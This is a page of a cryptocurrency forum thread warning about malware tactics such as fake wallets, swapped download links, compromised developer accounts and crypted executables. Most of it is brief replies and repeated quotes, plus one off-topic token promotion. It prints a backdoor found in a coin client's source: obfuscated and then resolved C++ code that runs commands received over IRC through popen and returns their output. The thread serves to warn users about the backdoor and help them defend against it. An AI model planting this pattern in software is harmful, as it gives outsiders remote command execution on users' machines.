Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 7. (Read 692059 times)
August 15, 2018, 07:53:50 AM
Thank you this thread I will now be more cautious. This is also the reason I dont participate on airdrops or bounties which requires downloading their wallet or some application as I highly suspect them as malware or a virus. Better safe than sorry and there are always other projects to offer rewards without any downloads.
August 15, 2018, 07:13:57 AM
Thanks for the advance guidance. I think such problem occurred with windows, imac and linux is more secure than it. But, I study more for this type issue.
August 15, 2018, 04:48:21 AM
Which altcoin do you guys think will boom this year, I'm for Staker. Maybe y'all should check it out on Twitter @stakertoken
August 14, 2018, 05:55:23 PM
Thanks to for nice information
keep your password safe and wallet security safe
keep your password safe and wallet security safe
August 13, 2018, 05:39:01 AM
Thanks for posting this, great to be aware of some of the risks out there.
August 13, 2018, 03:03:35 AM
After suffering an attack once, I've been very cautious of clicking on most malicious links I come across. Once bitten, twice shy they say
August 12, 2018, 01:50:29 PM
Thanks for sharing this info! It's always good practice to keep ourselves abreast of the various new stuff on cybersecurity.
August 12, 2018, 06:25:23 AM
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.
Yes you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops , it is necessary to be very attentive and careful.
This Hooligans know nothing but to steal from others. They are creative enough to create such innovation just to get other people's coins. why can't they just direct this enthusiasm into good use? Really appreciate the warning and tips from this post.
I personally experienced this with one of my MEW wallets. I was doing and airdrop and little did I know that my cons are being transferred 1 by 1. I lost about $800 worth of coins from that wallet and potentially more.
August 12, 2018, 06:21:19 AM
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.
Yes you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops , it is necessary to be very attentive and careful.
This Hooligans know nothing but to steal from others. They are creative enough to create such innovation just to get other people's coins. why can't they just direct this enthusiasm into good use? Really appreciate the warning and tips from this post.
August 11, 2018, 05:51:35 PM
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.
Yes you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops , it is necessary to be very attentive and careful.
August 08, 2018, 12:45:58 PM
damn, a lot of things. what do you think about DNS services? anti-viruses also solve the problem of hacking. I do save all passwords on flash drive to the computer nothing happened
August 06, 2018, 12:50:15 PM
Some steps must be taken which are good enough to protect your systems to be hacked such as not to use unknown exe, use of linux which seems to be less vunarable to virus.
August 06, 2018, 04:14:16 AM
what's the coin name ?
August 05, 2018, 06:49:20 AM
Much appreciated this was exceptionally useful. Malware contamination attemps is turning into an everyone issue. Programmers are winding up more risky and we additionally require focus on airdrop or giveaway. Numerous individuals will in any case lose their cash in next years....so data, similar to your post, is valuable. Much thanks to you.
August 05, 2018, 06:37:39 AM
These con artists are always picking up, getting to be more intelligent and more complex. Be cautious dependably. Download just from official locales and dependably check where the connection drives you will go.
August 04, 2018, 09:16:08 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Malwares or spywares are most common problems ,make sure that you are using an encrypted protections on device.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Malwares or spywares are most common problems ,make sure that you are using an encrypted protections on device.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
One of the best ways to prevent malware infecting your devices is to have a machine dedicated for crypto mining/trading. This will allow you to separate your normal activities on the internet and your cryptocurrency related activities. This reduces the chance of malware infecting your machine and hackers stealing personal data.
To prevent malicious attempts to utilise your machine's processing power for mining it is recommended that you follow general online security advice. Do not go on to suspicious websites, regularly update your anti-virus software and activate two factor authentication to prevent anyone else from accessing your accounts on online exchanges.
To prevent malicious attempts to utilise your machine's processing power for mining it is recommended that you follow general online security advice. Do not go on to suspicious websites, regularly update your anti-virus software and activate two factor authentication to prevent anyone else from accessing your accounts on online exchanges.
This is one of the most terrifying thing. I am super careful but they are getting stronger each day. 
Im a newbie here, thank you for your advice, hope all newbie can read this, and for those people who just clicking without even reading what pop ups real intention , maybe some pop ups are just full of virus that can corrupt their file. be safe everyone and be cautions. thank you
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.
Jump to: